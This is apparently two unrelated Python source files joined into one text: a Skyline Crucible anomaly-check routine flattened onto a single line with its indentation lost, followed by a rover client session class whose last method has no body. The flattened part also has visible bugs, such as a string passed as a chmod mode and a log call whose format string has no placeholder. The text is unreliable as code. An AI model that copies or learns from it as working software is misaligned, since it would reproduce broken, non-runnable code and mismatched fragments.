# if len(str(metric_vars.metric)) == 0: # if not metric_vars.metric: try: metric_vars.metric except: logger.error('error :: failed to read metric variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return else: metric = str(metric_vars.metric) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - metric - %s' % metric) # if len(metric_vars.value) == 0: # if not metric_vars.value: try: metric_vars.value except: logger.error('error :: failed to read value variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return else: value = str(metric_vars.value) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - value - %s' % (value)) # if len(metric_vars.from_timestamp) == 0: # if not metric_vars.from_timestamp: try: metric_vars.from_timestamp except: logger.error('error :: failed to read from_timestamp variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return else: from_timestamp = str(metric_vars.from_timestamp) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - from_timestamp - %s' % from_timestamp) # if len(metric_vars.metric_timestamp) == 0: # if not metric_vars.metric_timestamp: try: metric_vars.metric_timestamp except: logger.error('error :: failed to read metric_timestamp variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return else: metric_timestamp = str(metric_vars.metric_timestamp) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - metric_timestamp - %s' % metric_timestamp) # if len(metric_vars.algorithms) == 0: # if not metric_vars.algorithms: try: metric_vars.algorithms except: logger.error('error :: failed to read algorithms variable from check file setting to all' % (metric_check_file)) algorithms = ['all'] 
else: algorithms = [] for i_algorithm in metric_vars.algorithms: algorithms.append(i_algorithm) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - algorithms - %s' % algorithms) # if len(metric_vars.anomaly_dir) == 0: # if not metric_vars.anomaly_dir: try: metric_vars.anomaly_dir except: logger.error('error :: failed to read anomaly_dir variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return else: anomaly_dir = str(metric_vars.anomaly_dir) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - anomaly_dir - %s' % anomaly_dir) # if len(str(metric_vars.graphite_metric)) == 0: try: metric_vars.graphite_metric except: logger.info('failed to read graphite_metric variable from check file setting to False') # yes this is a string graphite_metric = 'False' else: graphite_metric = str(metric_vars.graphite_metric) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - graphite_metric - %s' % graphite_metric) # if len(str(metric_vars.run_crucible_tests)) == 0: try: metric_vars.run_crucible_tests except: logger.info('failed to read run_crucible_tests variable from check file setting to False') # yes this is a string run_crucible_tests = 'False' else: run_crucible_tests = str(metric_vars.run_crucible_tests) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - run_crucible_tests - %s' % run_crucible_tests) try: metric_vars.added_by except: if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('failed to read added_by variable from check file setting to crucible - set to crucible') added_by = 'crucible' else: added_by = str(metric_vars.added_by) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - added_by - %s' % added_by) try: metric_vars.run_script except: run_script = False if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - run_script - not present set to False') else: run_script = str(metric_vars.run_script) if 
settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric variable - run_script - %s' % run_script) # Only check if the metric does not a EXPIRATION_TIME key set, crucible # uses the alert EXPIRATION_TIME for the relevant alert setting contexts # whether that be analyzer, mirage, boundary, etc and sets its own # cache_keys in redis. This prevents large amounts of data being added # in terms of tieseries json and image files, crucible samples at the # same EXPIRATION_TIME as alerts. source_app = 'crucible' expiration_timeout = 1800 remove_all_anomaly_files = False check_expired = False check_time = time() if added_by == 'analyzer' or added_by == 'mirage': if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('Will check %s ALERTS' % added_by) if settings.ENABLE_ALERTS: if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('Checking %s ALERTS' % added_by) for alert in settings.ALERTS: ALERT_MATCH_PATTERN = alert[0] METRIC_PATTERN = metric alert_match_pattern = re.compile(ALERT_MATCH_PATTERN) pattern_match = alert_match_pattern.match(METRIC_PATTERN) if pattern_match: source_app = added_by expiration_timeout = alert[2] if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('matched - %s - %s - EXPIRATION_TIME is %s' % (source_app, metric, str(expiration_timeout))) check_age = int(check_time) - int(metric_timestamp) if int(check_age) > int(expiration_timeout): check_expired = True if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('the check is older than EXPIRATION_TIME for the metric - not checking - check_expired') if added_by == 'boundary': if settings.BOUNDARY_ENABLE_ALERTS: for alert in settings.BOUNDARY_METRICS: ALERT_MATCH_PATTERN = alert[0] METRIC_PATTERN = metric alert_match_pattern = re.compile(ALERT_MATCH_PATTERN) pattern_match = alert_match_pattern.match(METRIC_PATTERN) if pattern_match: source_app = 'boundary' expiration_timeout = alert[2] if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('matched - %s - %s - EXPIRATION_TIME is %s' % (source_app, metric, str(expiration_timeout))) check_age 
= int(check_time) - int(metric_timestamp) if int(check_age) > int(expiration_timeout): check_expired = True if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('the check is older than EXPIRATION_TIME for the metric - not checking - check_expired') cache_key = 'crucible.last_check.%s.%s' % (source_app, metric) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('cache_key - crucible.last_check.%s.%s' % (source_app, metric)) # Only use the cache_key EXPIRATION_TIME if this is not a request to # run_crucible_tests on a timeseries if run_crucible_tests == 'False': if check_expired: logger.info('check_expired - not checking Redis key') last_check = True else: if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('Checking if cache_key exists') try: last_check = self.redis_conn.get(cache_key) except Exception as e: logger.error('error :: could not query cache_key for %s - %s - %s' % (alerter, metric, e)) logger.info('all anomaly files will be removed') remove_all_anomaly_files = True if not last_check: try: self.redis_conn.setex(cache_key, expiration_timeout, packb(value)) logger.info('set cache_key for %s - %s with timeout of %s' % (source_app, metric, str(expiration_timeout))) except Exception as e: logger.error('error :: could not query cache_key for %s - %s - %s' % (alerter, metric, e)) logger.info('all anomaly files will be removed') remove_all_anomaly_files = True else: if check_expired: logger.info('check_expired - all anomaly files will be removed') remove_all_anomaly_files = True else: logger.info('cache_key is set and not expired for %s - %s - all anomaly files will be removed' % (source_app, metric)) remove_all_anomaly_files = True # anomaly dir if not os.path.exists(str(anomaly_dir)): try: mkdir_p(skyline_app, str(anomaly_dir)) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('created anomaly dir - %s' % str(anomaly_dir)) except: logger.error('error :: failed to create anomaly_dir - %s' % str(anomaly_dir)) if not os.path.exists(str(anomaly_dir)): logger.error('error :: 
anomaly_dir does not exist') fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return else: if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly dir exists - %s' % str(anomaly_dir)) failed_check_file = anomaly_dir + '/' + metric_timestamp + '.failed.check.' + metric + '.txt' if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('failed_check_file - %s' % str(failed_check_file)) # Retrieve data from graphite is necessary anomaly_graph = anomaly_dir + '/' + metric + '.png' anomaly_json = anomaly_dir + '/' + metric + '.json' anomaly_json_gz = anomaly_json + '.gz' if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly_graph - %s' % str(anomaly_graph)) logger.info('anomaly_json - %s' % str(anomaly_json)) logger.info('anomaly_json_gz - %s' % str(anomaly_json_gz)) # Some things added to crucible may not be added by a skyline app per se # and if run_crucible_tests is string True then no anomaly files should # be removed. if run_crucible_tests == 'True': remove_all_anomaly_files = False # Remove check and anomaly files if the metric has a EXPIRATION_TIME # cache_key set if remove_all_anomaly_files: if os.path.isfile(anomaly_graph): try: os.remove(anomaly_graph) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly_graph removed - %s' % str(anomaly_graph)) except OSError: pass if os.path.isfile(anomaly_json): try: os.remove(anomaly_json) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly_json removed - %s' % str(anomaly_json)) except OSError: pass if os.path.isfile(anomaly_json_gz): try: os.remove(anomaly_json_gz) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly_json_gz removed - %s' % str(anomaly_json_gz)) except OSError: pass anomaly_txt_file = anomaly_dir + '/' + metric + '.txt' if os.path.isfile(anomaly_txt_file): try: os.remove(anomaly_txt_file) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly_txt_file removed - %s' % str(anomaly_txt_file)) except OSError: pass # TBD - this data would have to be added to the panaorama DB before # 
it is removed if os.path.isfile(str(metric_check_file)): try: os.remove(str(metric_check_file)) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric_check_file removed - %s' % str(metric_check_file)) except OSError: pass if os.path.exists(str(anomaly_dir)): try: os.rmdir(str(anomaly_dir)) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly_dir removed - %s' % str(anomaly_dir)) except OSError: pass logger.info('check and anomaly files removed') return # Check if the image exists if graphite_metric == 'True': if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('graphite_metric - %s' % (graphite_metric)) # Graphite timeouts connect_timeout = int(settings.GRAPHITE_CONNECT_TIMEOUT) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('connect_timeout - %s' % str(connect_timeout)) read_timeout = int(settings.GRAPHITE_READ_TIMEOUT) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('read_timeout - %s' % str(read_timeout)) graphite_until = datetime.datetime.fromtimestamp(int(metric_timestamp)).strftime('%H:%M_%Y%m%d') graphite_from = datetime.datetime.fromtimestamp(int(from_timestamp)).strftime('%H:%M_%Y%m%d') # graphite URL if settings.GRAPHITE_PORT != '': url = settings.GRAPHITE_PROTOCOL + '://' + settings.GRAPHITE_HOST + ':' + settings.GRAPHITE_PORT + '/render/?from=' + graphite_from + '&until=' + graphite_until + '&target=' + metric + '&format=json' else: url = settings.GRAPHITE_PROTOCOL + '://' + settings.GRAPHITE_HOST + '/render/?from=' + graphite_from + '&until=' + graphite_until + '&target=' + metric + '&format=json' if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('graphite url - %s' % (url)) if not os.path.isfile(anomaly_graph): logger.info('retrieving png - surfacing %s graph from graphite from %s to %s' % (metric, graphite_from, graphite_until)) image_url = url.replace('&format=json', '') graphite_image_file = anomaly_dir + '/' + metric + '.png' if 'width' not in image_url: image_url += '&width=586' if 'height' not in image_url: image_url += '&height=308' if 
settings.ENABLE_CRUCIBLE_DEBUG: logger.info('graphite image url - %s' % (image_url)) image_url_timeout = int(connect_timeout) image_data = None try: image_data = urllib2.urlopen(image_url, timeout=image_url_timeout).read() logger.info('url OK - %s' % (image_url)) except urllib2.URLError: image_data = None logger.error('error :: url bad - %s' % (image_url)) if image_data is not None: with open(graphite_image_file, 'w') as f: f.write(image_data) logger.info('retrieved - %s' % (anomaly_graph)) if python_version == 2: mode_arg = int('0644') if python_version == 3: mode_arg = '0o644' os.chmod(graphite_image_file, mode_arg) else: logger.error('error :: failed to retrieved - %s' % (anomaly_graph)) else: if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly_graph file exists - %s' % str(anomaly_graph)) if not os.path.isfile(anomaly_graph): logger.error('error :: retrieve failed to surface %s graph from graphite' % (metric)) else: logger.info('graph image exists - %s' % (anomaly_graph)) # Check if the json exists if not os.path.isfile(anomaly_json_gz): if not os.path.isfile(anomaly_json): logger.info('surfacing timeseries data for %s from graphite from %s to %s' % (metric, graphite_from, graphite_until)) if requests.__version__ >= '2.4.0': use_timeout = (int(connect_timeout), int(read_timeout)) else: use_timeout = int(connect_timeout) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('use_timeout - %s' % (str(use_timeout))) try: r = requests.get(url, timeout=use_timeout) js = r.json() datapoints = js[0]['datapoints'] if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('data retrieved OK') except: datapoints = [[None, int(graphite_until)]] logger.error('error :: data retrieval failed') converted = [] for datapoint in datapoints: try: new_datapoint = [float(datapoint[1]), float(datapoint[0])] converted.append(new_datapoint) except: continue with open(anomaly_json, 'w') as f: f.write(json.dumps(converted)) if python_version == 2: mode_arg = int('0644') if python_version == 3: 
mode_arg = '0o644' os.chmod(anomaly_json, mode_arg) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('json file - %s' % anomaly_json) if not os.path.isfile(anomaly_json): logger.error('error :: failed to surface %s json from graphite' % (metric)) # Move metric check file try: shutil.move(metric_check_file, failed_check_file) logger.info('moved check file to - %s' % failed_check_file) except OSError: logger.error('error :: failed to move check file to - %s' % failed_check_file) pass return # Check timeseries json exists - raw or gz if not os.path.isfile(anomaly_json): if not os.path.isfile(anomaly_json_gz): logger.error('error :: no json data found' % (metric)) # Move metric check file try: shutil.move(metric_check_file, failed_check_file) logger.info('moved check file to - %s' % failed_check_file) except OSError: logger.error('error :: failed to move check file to - %s' % failed_check_file) pass return else: logger.info('timeseries json gzip exists - %s' % (anomaly_json_gz)) else: logger.info('timeseries json exists - %s' % (anomaly_json)) # If timeseries json and run_crucible_tests is str(False) gzip and # return here as there is nothing further to do if run_crucible_tests == 'False': if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('run_crucible_tests - %s' % run_crucible_tests) # gzip the json timeseries data if os.path.isfile(anomaly_json): if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('gzipping - %s' % anomaly_json) try: f_in = open(anomaly_json) f_out = gzip.open(anomaly_json_gz, 'wb') f_out.writelines(f_in) f_out.close() f_in.close() os.remove(anomaly_json) if python_version == 2: mode_arg = int('0644') if python_version == 3: mode_arg = '0o644' os.chmod(anomaly_json_gz, mode_arg) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('gzipped - %s' % anomaly_json_gz) try: os.remove(metric_check_file) logger.info('removed check file - %s' % metric_check_file) except OSError: pass return except: logger.error('error :: Failed to gzip data file - %s' % 
str(traceback.print_exc())) try: os.remove(metric_check_file) logger.info('removed check file - %s' % metric_check_file) except OSError: pass return if os.path.isfile(anomaly_json_gz): if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('gzip exists - %s' % anomaly_json) try: os.remove(metric_check_file) logger.info('removed check file - %s' % metric_check_file) except OSError: pass return nothing_to_do = 'true - for debug only' # self.check_if_parent_is_alive() # Run crucible algorithms logger.info('running crucible tests - %s' % (metric)) timeseries_dir = metric.replace('.', '/') if os.path.isfile(anomaly_json_gz): if not os.path.isfile(anomaly_json): if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('ungzipping - %s' % anomaly_json_gz) try: # with gzip.open(anomaly_json_gz, 'rb') as fr: fr = gzip.open(anomaly_json_gz, 'rb') raw_timeseries = fr.read() fr.close() except Exception as e: logger.error('error :: could not ungzip %s - %s' % (anomaly_json_gz, e)) traceback.print_exc() if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('ungzipped') logger.info('writing to - %s' % anomaly_json) with open(anomaly_json, 'w') as fw: fw.write(raw_timeseries) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly_json done') if python_version == 2: mode_arg = int('0644') if python_version == 3: mode_arg = '0o644' os.chmod(anomaly_json, mode_arg) else: if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('No gzip - %s' % anomaly_json_gz) nothing_to_do = 'true - for debug only' if os.path.isfile(anomaly_json): if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomaly_json exists - %s' % anomaly_json) if os.path.isfile(anomaly_json): if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('loading timeseries from - %s' % anomaly_json) with open(anomaly_json, 'r') as f: timeseries = json.loads(f.read()) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('loaded timeseries from - %s' % anomaly_json) else: try: logger.error('error :: file not found - %s' % anomaly_json) shutil.move(metric_check_file, 
failed_check_file) if python_version == 2: mode_arg = int('0644') if python_version == 3: mode_arg = '0o644' os.chmod(failed_check_file, mode_arg) logger.info('moved check file to - %s' % failed_check_file) except OSError: logger.error('error :: failed to move check file to - %s' % failed_check_file) pass return start_timestamp = int(timeseries[0][0]) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('start_timestamp - %s' % str(start_timestamp)) end_timestamp = int(timeseries[-1][0]) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('end_timestamp - %s' % str(end_timestamp)) full_duration = end_timestamp - start_timestamp if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('full_duration - %s' % str(full_duration)) self.check_if_parent_is_alive() run_algorithms_start_timestamp = int(time()) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('run_algorithms_start_timestamp - %s' % str(run_algorithms_start_timestamp)) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('run_algorithms - %s,%s,%s,%s,%s,%s' % (metric, str(end_timestamp), str(full_duration), anomaly_json, skyline_app, str(algorithms))) try: anomalous, ensemble = run_algorithms(timeseries, str(metric), end_timestamp, full_duration, str(anomaly_json), skyline_app, algorithms) except: logger.error('error :: run_algorithms failed - %s' % str(traceback.print_exc())) run_algorithms_end_timestamp = int(time()) run_algorithms_seconds = run_algorithms_end_timestamp - run_algorithms_start_timestamp if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomalous, ensemble - %s, %s' % (anomalous, str(ensemble))) if anomalous: if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('anomalous - %s' % (anomalous)) nothing_to_do = 'true - for debug only' logger.info('run_algorithms took %s seconds' % str(run_algorithms_seconds)) # Update anomaly file crucible_data = 'crucible_tests_run = "%s"\n' \ 'crucible_triggered_algorithms = %s\n' \ 'tested_by = "%s"\n' \ % (str(run_timestamp), str(ensemble), str(this_host)) crucible_anomaly_file = '%s/%s.txt' % 
(anomaly_dir, metric) with open(crucible_anomaly_file, 'a') as fh: fh.write(crucible_data) if python_version == 2: mode_arg = int('0644') if python_version == 3: mode_arg = '0o644' os.chmod(crucible_anomaly_file, mode_arg) logger.info('updated crucible anomaly file - %s/%s.txt' % (anomaly_dir, metric)) # gzip the json timeseries data after analysis if os.path.isfile(anomaly_json): if not os.path.isfile(anomaly_json_gz): try: f_in = open(anomaly_json) f_out = gzip.open(anomaly_json_gz, 'wb') f_out.writelines(f_in) f_out.close() f_in.close() os.remove(anomaly_json) if python_version == 2: mode_arg = int('0644') if python_version == 3: mode_arg = '0o644' os.chmod(anomaly_json_gz, mode_arg) logger.info('gzipped - %s' % (anomaly_json_gz)) except: logger.error('error :: Failed to gzip data file - %s' % str(traceback.print_exc())) else: os.remove(anomaly_json) if run_script: if os.path.isfile(run_script): logger.info('running - %s' % (run_script)) os.system('%s %s' % (str(run_script), str(crucible_anomaly_file))) # Remove metric check file try: os.remove(metric_check_file) logger.info('complete removed check file - %s' % (metric_check_file)) except OSError: pass def run(self): """ Called when the process intializes. 
""" # Log management to prevent overwriting # Allow the bin/<skyline_app>.d to manage the log if os.path.isfile(skyline_app_logwait): try: os.remove(skyline_app_logwait) except OSError: logger.error('error - failed to remove %s, continuing' % skyline_app_logwait) pass now = time() log_wait_for = now + 5 while now < log_wait_for: if os.path.isfile(skyline_app_loglock): sleep(.1) now = time() else: now = log_wait_for + 1 logger.info('starting %s run' % skyline_app) if os.path.isfile(skyline_app_loglock): logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app) try: os.remove(skyline_app_loglock) logger.info('log lock file removed') except OSError: logger.error('error - failed to remove %s, continuing' % skyline_app_loglock) pass else: logger.info('bin/%s.d log management done' % skyline_app) logger.info('process intialized') while 1: now = time() if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('process started - %s' % int(now)) # Make sure check_dir exists and has not been removed try: if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('checking check dir exists - %s' % settings.CRUCIBLE_CHECK_PATH) os.path.exists(settings.CRUCIBLE_CHECK_PATH) except: logger.error('error :: check dir did not exist - %s' % settings.CRUCIBLE_CHECK_PATH) if python_version == 2: mode_arg = int('0755') if python_version == 3: mode_arg = mode=0o755 os.makedirs(settings.CRUCIBLE_CHECK_PATH, mode_arg) logger.info('check dir created - %s' % settings.CRUCIBLE_CHECK_PATH) os.path.exists(settings.CRUCIBLE_CHECK_PATH) # continue # Make sure Redis is up try: self.redis_conn.ping() logger.info('connected to redis at socket path %s' % settings.REDIS_SOCKET_PATH) except: logger.info('skyline can not connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH) sleep(10) logger.info('connecting to redis at socket path %s' % settings.REDIS_SOCKET_PATH) self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) continue """ Determine if any metric has 
been added to test """ while True: # Report app up self.redis_conn.setex(skyline_app, 120, now) metric_var_files = [f for f in listdir(settings.CRUCIBLE_CHECK_PATH) if isfile(join(settings.CRUCIBLE_CHECK_PATH, f))] # if len(metric_var_files) == 0: if not metric_var_files: logger.info('sleeping 10 no metric check files') sleep(10) # Discover metric to analyze metric_var_files = '' metric_var_files = [f for f in listdir(settings.CRUCIBLE_CHECK_PATH) if isfile(join(settings.CRUCIBLE_CHECK_PATH, f))] # if len(metric_var_files) > 0: if metric_var_files: break metric_var_files_sorted = sorted(metric_var_files) metric_check_file = settings.CRUCIBLE_CHECK_PATH + "/" + str(metric_var_files_sorted[0]) logger.info('assigning check for processing - %s' % str(metric_var_files_sorted[0])) # Reset process_list self.process_list[:] = [] # Spawn processes pids = [] spawned_pids = [] pid_count = 0 run_timestamp = int(now) for i in range(1, CRUCIBLE_PROCESSES + 1): p = Process(target=self.spin_process, args=(i, run_timestamp, str(metric_check_file))) pids.append(p) pid_count += 1 logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(settings.CRUCIBLE_PROCESSES))) p.start() spawned_pids.append(p.pid) # Send wait signal to zombie processes # for p in pids: # p.join() # Self monitor processes and terminate if any spin_process has run # for longer than CRUCIBLE_TESTS_TIMEOUT p_starts = time() while time() - p_starts <= settings.CRUCIBLE_TESTS_TIMEOUT: if any(p.is_alive() for p in pids): # Just to avoid hogging the CPU sleep(.1) else: # All the processes are done, break now. time_to_run = time() - p_starts logger.info('%s :: %s spin_process/es completed in %.2f seconds' % (skyline_app, str(settings.CRUCIBLE_PROCESSES), time_to_run)) break else: # We only enter this if we didn't 'break' above. logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app)) for p in pids: p.terminate() p.join() while os.path.isfile(metric_check_file): sleep(1)
class ClientSession():
    """Manage the rover client's subprocesses and interface them to the GUI.

    This is a plain manager object, NOT a process. ``init_multiprocessing``
    must be called before any method that uses ``self.queues``,
    ``self.events``, ``self.pipes`` or ``self.drive_lifo``.
    """

    def __init__(self, cfg, **kwargs):
        """Store the configuration and the caller-provided queues.

        :param cfg: configuration object; ``cfg.network.address`` and
            ``cfg.network.port_command`` are read later.
        :param kwargs: must contain ``queue_log`` and ``queue_console``.
        :raises KeyError: if either queue is missing from ``kwargs``.
        """
        self.cfg = cfg
        # The log and console queues are provided by the caller.
        self.queue_log = kwargs['queue_log']
        self.queue_console = kwargs['queue_console']

        # Session logic objects.
        # Maps the first character of a received message to its handler.
        # NOTE(review): nothing in this class registers a handler here (not
        # even msgtreat_status) - presumably the caller does; confirm.
        self.dict_dispatch_rx = {}
        self.rover_status = {
            'headlights': False,
            'speed': 0,
            'battery': 100.0,
            'list_audio_files': [],
        }

        # Rover control objects: direction name -> command string.
        self.dict_rover_drive = {
            'stop': 'DG5',
            'north': 'DG8',
            'north_east': 'DG9',
            'east': 'DG6',
            'south_east': 'DG3',
            'south': 'DG2',
            'south_west': 'DG1',
            'west': 'DG4',
            'north_west': 'DG7',
        }

    def init_multiprocessing(self):
        """Create the shared IPC objects and build the comms process."""
        self.events = {}
        self.pipes = {}
        self.locks = {}
        self.queues = {}
        self.managers = {}

        # Events / sync objects.
        self.pipes['comms'] = Pipe()
        self.queues['cmd'] = JoinableQueue()
        self.queues['rx'] = JoinableQueue()
        self.queues['tx'] = JoinableQueue()
        self.queues['log'] = self.queue_log
        self.managers['videoframes'] = Manager().list()
        self.events['comms_enable'] = Event()
        self.events['comms_server_disconnect'] = Event()
        self.drive_lifo = Manager().list()

        # Processes.
        # Comms: this object keeps end [0] of the pipe, the process gets [1].
        self.commprocess = CommProcess(
            events={'enable': self.events['comms_enable'],
                    'server_disconnect': self.events['comms_server_disconnect']},
            queues={'log': self.queues['log'],
                    'tx': self.queues['tx'],
                    'rx': self.queues['rx']},
            pipes={'session': self.pipes['comms'][1]},
            tx_lifo=self.drive_lifo,
            rover_address=self.cfg.network.address,
            rover_port_command=self.cfg.network.port_command)

    #################################
    ## Logging / support
    #################################
    def queue_to_log(self, msg):
        """Put ``msg`` on the log queue."""
        self.queues['log'].put(msg)

    def queue_to_console(self, msg):
        """Put ``msg`` on the console queue."""
        self.queue_console.put(msg)

    def queue_to_log_and_console(self, msg):
        """Put ``msg`` on both the log and the console queue."""
        self.queue_to_log(msg)
        self.queue_to_console(msg)

    #################################
    ## COMMS METHODS
    #################################
    def comms_launch_process(self):
        """Start the comms process.

        :return: ``(success, message)``; on failure the error is logged and
            the ``comms_server_disconnect`` event is set.
        """
        try:
            self.commprocess.start()
        except Exception as e:
            msg = 'error:could not launch Comms process : %s\n' % e
            self.queue_to_log(msg)
            self.events['comms_server_disconnect'].set()
            return False, msg
        msg = 'Comms process successfully launched.\n'
        return True, msg

    def comms_flush_rxtx_queues(self):
        """Discard everything currently waiting in the rx and tx queues."""
        for name in ('rx', 'tx'):
            pending = self.queues[name]
            while not pending.empty():
                pending.get()
                # Both are JoinableQueues: acknowledge each removed item so
                # the unfinished-task count stays balanced, as
                # comms_fetch_rx already does.
                pending.task_done()

    def comms_enable(self):
        """Ask the comms process to connect and wait for its status report.

        :return: ``(connected, message)``.
        """
        msg = 'Attempting connection to rover (%s,%s) ...\n' % (
            self.cfg.network.address, self.cfg.network.port_command)
        # This message used to be built and then silently overwritten.
        self.queue_to_log(msg)
        self.events['comms_enable'].set()
        # Block until the comms process reports a (result, message) pair.
        result, msg = self.pipes['comms'][0].recv()
        # Explicit comparison kept on purpose: the type of ``result`` is
        # decided by CommProcess, which is not visible from here.
        if result == True:
            msg = 'Successfully connected to rover.\n'
            retbool = True
        else:
            msg = 'Error:could not connect to rover: %s\n' % msg.strip()
            self.events['comms_enable'].clear()
            retbool = False
        return retbool, msg

    def comms_close(self):
        """Disable comms, wait for the process, flush queues and report."""
        self.events['comms_enable'].clear()
        if self.commprocess.is_alive():
            self.commprocess.join()
        self.comms_flush_rxtx_queues()
        msg = 'Connection to rover closed.\n'
        self.queues['log'].put(msg)
        self.queue_console.put(msg)

    def comms_push_command(self, cmdstring):
        """Strip ``cmdstring`` and queue it for transmission."""
        cmd = cmdstring.strip()
        self.queues['tx'].put(cmd)

    def comms_push_drive_lifo(self, cmdstring):
        """Append a drive command to the shared drive LIFO."""
        self.drive_lifo.append(cmdstring)

    def comms_fetch_rx(self):
        """Return up to ``FETCH_RX_BURST_SIZE`` messages from the rx queue."""
        reslist = []
        rx_queue = self.queues['rx']
        while len(reslist) < FETCH_RX_BURST_SIZE and not rx_queue.empty():
            reslist.append(rx_queue.get())
            rx_queue.task_done()
        return reslist

    ####################################################
    ## Session logic
    ####################################################
    def msgtreat_status(self, message):
        """Update ``rover_status`` from a status message.

        ``message[0]`` is the dispatch character, ``message[1]`` selects the
        field (``B`` battery, ``S`` speed, ``H`` headlights) and the rest is
        the value. A missing or unparsable value leaves the status untouched
        and sends a warning to the log and console queues.
        """
        msg_body = message[1:]
        if not msg_body:
            return

        field = msg_body[0]
        value_str = msg_body[1:]
        malformed = None

        if field == 'B':
            try:
                # float('') raises too, so an empty value is caught as well.
                self.rover_status['battery'] = float(value_str)
            except ValueError:
                malformed = "warning:malformed battery status message:\"%s\"\n" % message
        elif field == 'S':
            try:
                self.rover_status['speed'] = int(value_str)
            except ValueError:
                malformed = "warning:malformed speed setting status message:\"%s\"\n" % message
        elif field == 'H':
            if value_str:
                self.rover_status['headlights'] = (value_str == '1')
            else:
                malformed = "warning:malformed headlights status message:\"%s\"\n" % message

        if malformed is not None:
            self.queue_to_log_and_console(malformed)

    def msgtreat_default(self, message):
        """Default handler: forward the message to the console queue."""
        self.queue_console.put(message)

    def analyze_received_messages(self, list_messages):
        """Dispatch each message on its first character.

        :return: ``False`` if any message was empty, ``True`` otherwise.
        """
        ret = True
        for message in list_messages:
            if len(message) > 0:
                handler = self.dict_dispatch_rx.get(message[0],
                                                    self.msgtreat_default)
                handler(message)
            else:
                # One-element tuple so an empty tuple message formats too.
                self.queue_to_log_and_console(
                    "warning: empty message received from rover:\"%s\"\n" % (message,))
                ret = False
        return ret

    ####################################################
    ## Rover controls
    ####################################################
    ##### Status / Accessory
    def rover_request_status_update(self):
        """Queue a status-update request (``SU``)."""
        self.comms_push_command('SU')

    def rover_headlights_on(self):
        """Queue the headlights-on command (``H1``)."""
        self.comms_push_command('H1')

    def rover_headlights_off(self):
        """Queue the headlights-off command (``H0``)."""
        self.comms_push_command('H0')

    ##### Drive
    def rover_drive(self, where='stop'):
        """Queue the drive command for direction ``where``.

        :raises KeyError: if ``where`` is not a key of ``dict_rover_drive``.
        """
        self.comms_push_command(self.dict_rover_drive[where])

    def rover_flush_drive_lifo(self, keep=1):
        """Trim the shared drive LIFO in place.

        The list is mutated rather than rebound: ``self.drive_lifo`` is the
        same object that was handed to the comms process as ``tx_lifo``, and
        rebinding the attribute would leave that process's list untouched.

        :param keep: ``0`` empties the list; otherwise the last ``keep``
            entries are dropped (original slicing preserved).
        """
